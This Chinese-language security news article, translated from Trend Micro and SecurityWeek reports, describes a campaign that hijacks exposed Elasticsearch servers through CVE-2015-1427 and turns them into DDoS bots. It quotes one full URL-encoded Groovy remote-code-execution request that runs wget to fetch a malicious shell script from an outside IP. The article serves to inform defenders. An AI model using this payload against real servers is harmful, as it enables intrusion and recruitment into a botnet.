有黑客正将公网中的Elasticsearch转换为DDoS工具

iso60001  1981天前

22.png

据趋势科技的报告,最近检测到一股新兴的网络攻击活动,攻击者试图将公网上不安全的Elasticsearch拉入分布式拒绝服务(DDoS)攻击的僵尸网络中。

攻击者会通过多个恶意脚本在Elasticsearch服务器上建立后门,持久控制,并将其转换为DDoS僵尸。

33.png

在攻击的准备阶段,攻击者会搜索公网上所有能访问到的Elasticsearch服务器,并利用CVE-2015-1427(ElasticSearch Groovy远程代码执行漏洞)进行扫描攻击,攻击样例如下所示。一旦攻击成功,控制了目标服务器,就会下载第一阶段恶意脚本。

request_url=”3[.]17[.]149[.]255[:]9200/_search?source=%7B%22query%22%3A+%7B%22filtered%22%3A+%7B%22query%22%3A+%7B%22match_all%22%3A+%7B%7D%7D%7D%7D%2C+%22sc ript_fields%22%3A+%7B%22exp%22%3A+%7B%22sc ript%22%3A+%22import+java.util.%2A%3Bimport+java.io.%2A%3BString+str+%3D+%5C%22%5C%22%3BBufferedReader+br+%3D+new+BufferedReader%28new+InputStreamReader%28Runtime.getRuntime%28%29.exec%28%5C%22wget+154.223.159.5%2Fs67.sh+-O+S67%5C%22%29.getInputStream%28%29%29%29%3BStringBuilder+sb+%3D+new+StringBuilder%28%29%3Bwhile%28%28str%3Dbr.readLine%28%29%29%21%3Dnull%29%7Bsb.append%28str%29%3Bsb.append%28%5C%22%5Cr%5Cn%5C%22%29%3B%7Dsb.toString%28%29%3B%22%7D%7D%2C+%22size%22%3A+1%7D

第一阶段恶意脚本会尝试关闭防火墙,再从攻击者控制的网站下载第二阶段恶意脚本。

44.png

攻击者会把第二阶段恶意脚本放置在已非法入侵的其他网站上,一旦发现脚本有被他人扫描检测的迹象,立刻用其他已控制网站进行切换。

第二阶段脚本具有与第一阶段脚本类似的功能,它也会试图关闭防火墙。除此之外,它还会删除某些可能与自己发生冲突的软件(例如其他挖矿软件)以及在/tmp目录中的各种配置文件。

55.png

接下来,排除对自己的一切不利因素(挖矿以及其他无关进程等),尝试删除初始攻击痕迹,下载恶意软件。

66.png

最终的payload是一个后门,能够窃取系统信息并驱动机器发动DDoS攻击。这种批量控制服务器并发动DDoS攻击的安全事件以前也发生过,主要涉及到CVE-2017-5638,这是Apache Struts 2中的一个远程代码执行漏洞。

这次攻击活动中的恶意软件类似于BillGates,该恶意软件于2014年首次被发现,并以劫持系统、发起DDoS攻击而闻名。 趋势科技的安全人员也确认了这点。

今年早些时候,思科的Talos安全研究人员就透露过,有多个黑客团体瞄准了公网上不安全的Elasticsearch集群,其中一个团队就试图用BillGates感染服务器。

趋势科技最后表示,对Elasticsearch服务器的攻击往往是低成本高收益的。攻击者往往瞄准那些存在权限控制缺陷、配置错误以及版本过低的Elasticsearch,进行勒索和挖矿攻击。此次攻击活动中,攻击者使用了多阶段的恶意脚本,并且为了防止被溯源,还使用了大量肉鸡网站来传递脚本。这说明攻击者是在深思熟虑,且做了很多准备后,才发动如此大规模的攻击活动。

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场
来源:https://www.securityweek.com/attackers-turn-elasticsearch-databa ses-ddos-bots
     https://blog.trendmicro.com/trendlabs-security-intelligence/multistage-attack-delivers-billgates-setag-backdoor-can-turn-elasticsearch-databa ses-into-ddos-botnet-zombies/

最新评论

昵称
邮箱
提交评论